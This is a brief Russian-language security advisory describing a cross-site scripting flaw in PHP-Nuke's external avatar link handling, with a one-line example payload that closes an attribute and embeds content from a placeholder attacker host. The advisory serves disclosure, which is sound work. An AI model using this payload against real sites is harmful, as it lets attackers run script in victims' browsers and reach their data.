Программа: PHP-Nuke

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к потенциально важным
данным других пользователей. Уязвимость
существует из-за недостаточной обработки
входных данных при создании ссылки на
внешний аватар. Удаленный пользователь
может с помощью специально сформированного
запроса выполнить произвольный HTML сценарий
в браузере жертвы в контексте безопасности
уязвимого сайта. П

ример:

" width=0 height=0><embed src=http://[attacker]/redirect.swf width=0
height=0><img src=http://[attacker]/avatar.bmp



Оставить мнение